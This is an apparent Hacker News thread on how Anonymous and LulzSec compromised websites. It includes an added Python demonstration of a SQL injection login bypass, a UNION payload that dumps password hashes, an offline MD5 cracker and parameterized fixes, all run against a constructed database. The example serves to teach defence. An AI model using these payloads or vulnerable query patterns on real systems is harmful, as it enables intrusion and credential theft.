

Ask HN: How do Anonymous and Lulz hack so many sites? - jason_slack

I'd like to ask how do Anonymous and Lulz gain access to so many systems? Obviously this could be due to unpatched systems, weak passwords, poor security, etc., but are they really doing anything advanced to gain access?

I have to wonder, with proper security practice, would as many of these hacks occur?

Are these places running proper firewalling?

Are they running vulnerable services like SSH on an obscure port?

Are their database servers more exposed than they should be?

Are they using horrible passwords?

Do they not review logs?

Get what I am asking? I mean, for even my home internet circuit I run a dedicated firewall, don't run SSH on 22, and deny everything except what I need.

Can anyone provide any thoughts?
======
gee_totes
All of the above, and more. For example, in the HBGary hack, they used a
combination of SQL injection to expose passwords, got lucky when some of these
passwords could be re-used for SSH access, then had to resort to good ol'
social engineering for full control of the system. This article provides some
good insights:

[http://arstechnica.com/tech-policy/news/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack.ars/1](http://arstechnica.com/tech-policy/news/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack.ars/1)

There is no magic bullet to stop these types of hackers. It's important that
you practice good security culture, since some of these guys do use very
advanced techniques.

Your home internet security could be defeated by a cunning hacker with a
multimeter claiming he/she is there from Comcast to 'upgrade' your router.

~~~
devs1010
Yes, exactly this. I think this was just on Reddit the other day, as I remember
reading about it.

------
daniellockard
From what I know of Anon and LulzSec, a lot of what they do isn't actually
'hacking.' The sheer number of boxes they have lets them DDoS any site pretty
easily. If not DDoS, they usually do SQL injections.

------
devs1010
Honestly, the question I'm more interested in is how they hide their tracks.
From my knowledge, this can be done with a lot of "geographical" effort by
going to public locations that are random and far enough from a person's
normal routine, and using hardware that can't be traced to you but I wonder if
they actually do this or if they normally do their activities from the comfort
of their home.

------
Andrenid
Most of what I've seen has been via SQL injections in badly coded sites.

------
shrimp
Most intrusions these days seem to start with a vulnerable web app; then the
passwords for that are tried on DBs, SSH, etc.

good luck, flamoot
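The chain that gee_totes and shrimp describe above (inject into a badly coded web app, dump the credential table, crack the hashes offline, then try the recovered passwords elsewhere) is easy to reproduce in miniature. The following is an added example, not code from the thread or from any of its posters: it uses an in-memory SQLite database with a constructed `users` table, constructed user names, hashes and wordlist, and shows the string-concatenated query beside its parameterized replacement. The two `_vulnerable` functions deliberately build SQL from user input; the `_safe` ones are the fix.

```python
"""Added example (not from the thread): SQL injection -> credential dump -> offline
crack, against a constructed SQLite database. Names, hashes and wordlist are made up."""
import hashlib
import sqlite3

# Constructed sample data: unsalted MD5, as many 2011-era web apps stored it.
SAMPLE_USERS = [(1, "admin", "Password123"), (2, "editor", "letmein")]
WORDLIST = ["123456", "letmein", "qwerty", "Password123"]   # constructed

# Payloads (assumed attacker input for this example).
BYPASS_USERNAME = "admin' --"                      # comments out the password check
DUMP_PAYLOAD = "zzz%' UNION SELECT username || ':' || pw_md5 FROM users --"


def make_db() -> sqlite3.Connection:
    """Build the constructed users table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_md5 TEXT)")
    for uid, name, pw in SAMPLE_USERS:
        conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                     (uid, name, hashlib.md5(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Vulnerable: the username is spliced into the SQL grammar by string formatting."""
    pw_md5 = hashlib.md5(password.encode()).hexdigest()
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND pw_md5 = '{pw_md5}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Fixed: bound parameters; the input can never change the query structure."""
    pw_md5 = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute("SELECT id FROM users WHERE username = ? AND pw_md5 = ?",
                       (username, pw_md5)).fetchone()
    return row is not None


def search_vulnerable(conn, term: str) -> list:
    """Vulnerable 'find user' endpoint: a UNION in `term` appends any column the
    attacker wants (here the password hashes) to the result set."""
    sql = f"SELECT username FROM users WHERE username LIKE '%{term}%'"
    return [r[0] for r in conn.execute(sql)]


def search_safe(conn, term: str) -> list:
    """Fixed: the wildcard pattern is built in Python and passed as a parameter."""
    rows = conn.execute("SELECT username FROM users WHERE username LIKE ?",
                        (f"%{term}%",))
    return [r[0] for r in rows]


def crack_md5(dumped: list, wordlist: list) -> dict:
    """Offline dictionary attack on 'user:md5' strings from the dump.
    Unsalted hashes mean one wordlist pass cracks every user at once."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    found = {}
    for entry in dumped:
        user, _, digest = entry.partition(":")
        if digest in lookup:
            found[user] = lookup[digest]
    return found


if __name__ == "__main__":
    db = make_db()
    print("bypass (vulnerable):", login_vulnerable(db, BYPASS_USERNAME, "wrong"))
    print("bypass (safe):      ", login_safe(db, BYPASS_USERNAME, "wrong"))
    dump = search_vulnerable(db, DUMP_PAYLOAD)
    print("dumped:", dump)
    print("cracked:", crack_md5(dump, WORDLIST))
    print("safe search:", search_safe(db, DUMP_PAYLOAD))
```

The last step of the real chain, trying the cracked passwords against SSH and other hosts, is not shown; the point of the example is that everything up to it follows from one unparameterized query, which is why the replies above keep pointing at the web app rather than at the firewall.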

------
hashdb
They are a group of very educated hackers with a lot of time to gdb widely used
applications running suid root. They do not publish their remote exploit
intel... aka blackhats, and they're ambitious. That in itself, with motives to
prove a point, is dangerous; these guys are not careless, are very organized, and
strike all at once.

------
hashdb
I doubt DoJ and government sites ignore SQL issues. I could be wrong, but I'd
find that odd.

------
pcvarmint
Some attacks are by government agents claiming to be "Anonymous" in order to
justify passing draconian laws like SOPA.

